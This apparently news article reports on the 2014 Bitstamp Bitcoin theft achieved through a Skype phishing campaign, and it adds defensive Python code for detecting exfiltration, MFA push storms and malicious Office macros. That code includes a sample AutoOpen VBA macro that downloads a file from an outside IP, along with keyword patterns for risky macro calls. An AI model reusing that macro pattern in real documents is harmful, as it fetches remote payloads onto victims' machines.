Newly leaked confidential documents have revealed details of a cyberattack on Bitstamp, a company whose core business is trading cryptocurrency, according to a report in SC Magazine.
The Bitcoin trading company suffered a breach on 29 December 2014 and admitted the theft within days. A total of 18,866 Bitcoins, worth nearly $5.3 million, were lost in the attack. According to ZDNet's estimates from May, Bitstamp held 183,497 Bitcoins in its reserves, worth nearly $53 million. Simply put, the exchange lost roughly 10 percent of its assets in the raid.
Insight into the Breach
The report, authored by Bitstamp’s general counsel, George Frost, revealed that:
- The loss of assets was first discovered on 4 January by Damian Merlak, the chief technology officer, who noticed a suspicious transfer of 3.5 GB of data to an unfamiliar IP address.
- The size immediately raised a red flag: it matched exactly the size of wallet.dat, the file holding Bitstamp's Bitcoin reserves in its wallet.
- The report deemed this a sophisticated, targeted attack, since the attacker had needed three IP addresses to connect to the company's data server.
- The remote intrusion was carried out from the laptop of Luka Kodric, a Bitstamp employee, which was connected to the company's server over VPN at the time.
- With access to the wallet secured, the attacker then accessed a different server to obtain the passphrases needed to access the Bitcoins.
The report also revealed a separate breach attempt that again used Kodric's account. His VPN connection, however, had two-factor authentication enabled, so within 20 minutes Kodric received nine notifications on his phone asking him to supply the passkey as additional authentication. These login attempts were traced to a Romanian IP address. A burst of unsolicited prompts like this is itself a signal worth alerting on: the second factor held, but the attacker was clearly already in possession of the first.
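The two indicators described above, a transfer to an unfamiliar IP whose size matches a sensitive file and a burst of MFA push prompts against one account, both lend themselves to simple detection rules. The following is an added example, not code from the report or from Bitstamp: it runs two such rules over constructed log lines. The log formats, the destination allow-list, the wallet.dat size and the thresholds are all assumptions made for the example.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample records, not Bitstamp's real logs.
# Transfer records: "<ISO time> <user> <dst_ip> <bytes>"; the 3.5 GB record mirrors the size in the report.
TRANSFER_LOG = [
    "2015-01-03T23:10:05 svc_backup 10.0.0.12 52428800",
    "2015-01-04T02:40:51 lkodric 203.0.113.77 3758096384",
    "2015-01-04T03:02:13 lkodric 10.0.0.12 1048576",
]
KNOWN_DESTINATIONS = {"10.0.0.12", "10.0.0.15"}  # assumed allow-list of internal hosts
WALLET_DAT_BYTES = 3758096384                     # assumed size of the protected wallet.dat

# MFA records: "<ISO time> <user> <event> <src_ip>"; nine pushes in 18 minutes for one user.
MFA_LOG = [
    "2015-01-06T08:00:00 lkodric push_sent 10.0.0.50",
    "2015-01-06T08:00:30 lkodric push_approved 10.0.0.50",
] + [
    f"2015-01-06T09:{m:02d}:00 lkodric push_sent 198.51.100.9" for m in (0, 2, 3, 5, 7, 9, 12, 15, 18)
] + [
    "2015-01-06T09:30:00 dmerlak push_sent 10.0.0.51",
    "2015-01-06T09:31:00 dmerlak push_approved 10.0.0.51",
]


def parse_transfers(lines):
    """Parse transfer records into (time, user, dst_ip, bytes) tuples."""
    out = []
    for line in lines:
        ts, user, dst, size = line.split()
        out.append((datetime.fromisoformat(ts), user, dst, int(size)))
    return out


def flag_exfil(lines, known_dst, sensitive_size, tolerance=0.02, big=1 << 30):
    """Rule 1: transfers to destinations outside the allow-list that are either large
    or match the size of a sensitive file (here wallet.dat) within `tolerance`."""
    hits = []
    for ts, user, dst, size in parse_transfers(lines):
        if dst in known_dst:
            continue
        size_match = abs(size - sensitive_size) <= tolerance * sensitive_size
        if size_match or size >= big:
            hits.append({
                "time": ts.isoformat(), "user": user, "dst": dst, "bytes": size,
                "reason": "size matches wallet.dat" if size_match else "large transfer",
            })
    return hits


def flag_push_storm(lines, max_prompts=5, window=timedelta(minutes=20)):
    """Rule 2: sliding-window count of MFA push prompts per user. Returns the users
    whose prompt count inside `window` reached `max_prompts`, with the peak count
    and the source IPs seen in the offending windows."""
    prompts = defaultdict(list)
    for line in lines:
        ts, user, event, src = line.split()
        if event == "push_sent":
            prompts[user].append((datetime.fromisoformat(ts), src))
    alerts = {}
    for user, events in prompts.items():
        events.sort()
        start = 0
        for end in range(len(events)):
            while events[end][0] - events[start][0] > window:
                start += 1
            count = end - start + 1
            if count >= max_prompts:
                alert = alerts.setdefault(user, {"peak": 0, "src_ips": set()})
                alert["peak"] = max(alert["peak"], count)
                alert["src_ips"].update(src for _, src in events[start:end + 1])
    return alerts


if __name__ == "__main__":
    for hit in flag_exfil(TRANSFER_LOG, KNOWN_DESTINATIONS, WALLET_DAT_BYTES):
        print("EXFIL", hit)
    for user, alert in flag_push_storm(MFA_LOG).items():
        print("MFA STORM", user, alert["peak"], sorted(alert["src_ips"]))
```

Both rules are deliberately dumb: the size-match rule only works if you know the sizes of the files you care about, and the push-storm rule assumes the identity provider logs each prompt with a source address. The value is in correlating them with the VPN session that originated the prompts or the transfer, which is the step the report says happened only after the fact.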
The weakest link in a hack – the human element
Kodric was one of six employees targeted in a phishing campaign between 4 November and 12 December. The attackers made persistent contact via Skype and, once they had gained Kodric's trust, sent a series of innocuous-looking Word documents containing malicious VBA macros designed to connect back to an external IP address controlled by the attacker.
Additional malicious files were then sent to Kodric via Skype, and once his compromised laptop connected to the company network the attackers were able to reach the wallet.dat file; the successful hack followed on 29 December, when they used the passphrases to log in to the data file server.
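A document carrying a VBA macro that calls out to an external IP is detectable before it is opened, provided the macro source is actually examined rather than grepped in its stored form: VBA modules inside vbaProject.bin are stored with MS-OVBA compression, so indicator strings are not visible in the raw bytes. The following added example, not code from the report or from Bitstamp, implements the MS-OVBA decompressor, builds a constructed macro-enabled OOXML package in memory, and scans the recovered source for auto-execute entry points, risky calls and network indicators. One simplification is labelled in the code: real vbaProject.bin files wrap the compressed module streams in an OLE compound file, which this example does not parse, so the sample stores the compressed container directly. The sample macro, the indicator lists and the verdict rule are assumptions made for the example.

```python
import io
import math
import re
import struct
import zipfile


def ovba_compress(data):
    """Single-chunk MS-OVBA compressor (input <= 4096 bytes): greedy longest match,
    token layout per MS-OVBA section 2.4.1. Used here only to build the constructed sample."""
    assert len(data) <= 4096
    body, pos = bytearray(), 0
    while pos < len(data):
        flags, tokens = 0, bytearray()
        for bit in range(8):                       # one flag byte covers eight tokens
            if pos >= len(data):
                break
            bit_count = max(math.ceil(math.log2(pos)), 4) if pos > 0 else 4
            max_len = (0xFFFF >> bit_count) + 3
            best_len = best_off = 0
            for off in range(1, min(pos, 1 << bit_count) + 1):
                n = 0
                while n < max_len and pos + n < len(data) and data[pos + n] == data[pos - off + n]:
                    n += 1
                if n > best_len:
                    best_len, best_off = n, off
            if best_len >= 3:                      # copy token: offset in the high bits, length-3 in the low bits
                flags |= 1 << bit
                tokens += struct.pack("<H", ((best_off - 1) << (16 - bit_count)) | (best_len - 3))
                pos += best_len
            else:                                  # literal token
                tokens.append(data[pos])
                pos += 1
        body.append(flags)
        body += tokens
    # Container: signature 0x01, then chunk header: compressed flag, signature 0b011, size-3.
    return b"\x01" + struct.pack("<H", 0xB000 | (len(body) - 1)) + bytes(body)


def ovba_decompress(container):
    """MS-OVBA decompression of a compressed container, as stored in the VBA module
    streams of vbaProject.bin. Handles both compressed and raw (uncompressed) chunks."""
    if not container or container[0] != 0x01:
        raise ValueError("not an MS-OVBA compressed container")
    out, cur = bytearray(), 1
    while cur < len(container):
        chunk_start = cur
        header = struct.unpack_from("<H", container, cur)[0]
        if (header >> 12) & 0x7 != 0b011:
            raise ValueError("bad chunk signature")
        chunk_end = min(len(container), chunk_start + (header & 0x0FFF) + 3)
        cur += 2
        dec_start = len(out)
        if not header >> 15:                       # raw chunk: 4096 bytes copied verbatim
            out += container[cur:cur + 4096]
            cur += 4096
            continue
        while cur < chunk_end:
            flags = container[cur]
            cur += 1
            for bit in range(8):
                if cur >= chunk_end:
                    break
                if not (flags >> bit) & 1:
                    out.append(container[cur])
                    cur += 1
                    continue
                token = struct.unpack_from("<H", container, cur)[0]
                cur += 2
                diff = len(out) - dec_start        # bit split depends on position within the chunk
                if diff == 0:
                    raise ValueError("copy token at chunk start")
                bit_count = max(math.ceil(math.log2(diff)), 4)
                length = (token & (0xFFFF >> bit_count)) + 3
                offset = (token >> (16 - bit_count)) + 1
                src = len(out) - offset
                for i in range(length):            # byte-wise so overlapping copies work
                    out.append(out[src + i])
    return bytes(out)


# Constructed sample macro (indicator-bearing, not taken from the real attachments).
SAMPLE_VBA = (b'Sub AutoOpen()\r\n'
              b'    Set h = CreateObject("MSXML2.XMLHTTP")\r\n'
              b'    h.Open "GET", "http://203.0.113.77/update.bin", False\r\n'
              b'    h.Send\r\n'
              b'End Sub\r\n')


def build_sample_ooxml(vba_source=None):
    """Build a minimal OOXML package in memory. Simplification: the compressed VBA container
    is stored directly as word/vbaProject.bin; real files wrap module streams in an OLE file."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("word/document.xml", "<w:document/>")
        if vba_source is not None:
            z.writestr("word/vbaProject.bin", ovba_compress(vba_source))
    return buf.getvalue()


AUTO_EXEC = re.compile(rb"\b(AutoOpen|Auto_Open|Document_Open|AutoExec|Workbook_Open)\b", re.I)
SUSPICIOUS = re.compile(rb"\b(Shell|CreateObject|XMLHTTP|URLDownloadToFile|WScript|Environ)\b", re.I)
NETWORK = re.compile(rb"https?://[^\s\"']+|\b(?:\d{1,3}\.){3}\d{1,3}\b")


def inspect_ooxml(blob):
    """Report whether an OOXML file carries a VBA project and which indicators its source contains."""
    findings = {"has_vba": False, "auto_exec": [], "suspicious": [], "network": [], "verdict": "clean"}
    with zipfile.ZipFile(io.BytesIO(blob)) as z:
        macro = next((n for n in z.namelist() if n.lower().endswith("vbaproject.bin")), None)
        if macro is None:
            return findings
        findings["has_vba"] = True
        source = ovba_decompress(z.read(macro))
    for key, rx in (("auto_exec", AUTO_EXEC), ("suspicious", SUSPICIOUS), ("network", NETWORK)):
        findings[key] = sorted({m.decode() for m in rx.findall(source)})
    if findings["auto_exec"] and (findings["suspicious"] or findings["network"]):
        findings["verdict"] = "suspicious"     # runs on open and reaches out or spawns something
    else:
        findings["verdict"] = "macro-enabled"
    return findings


if __name__ == "__main__":
    print(inspect_ooxml(build_sample_ooxml(SAMPLE_VBA)))
```

The decompressor is the part worth keeping: it is what lets a mail gateway or a sandbox look at the actual macro text, and the same routine serves any OLE-based Office format once the module streams have been located. The keyword lists are only a starting point; in practice an auto-execute entry point combined with any outbound network call is a strong enough signal to quarantine an unsolicited attachment.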
Kevin Epstein, a cybersecurity expert, noted the human element in the breach and said, “This is yet further confirmation that the human factor remains the weakest link in many security profiles – and that use of attachments and macros continues to exploit that weakness.”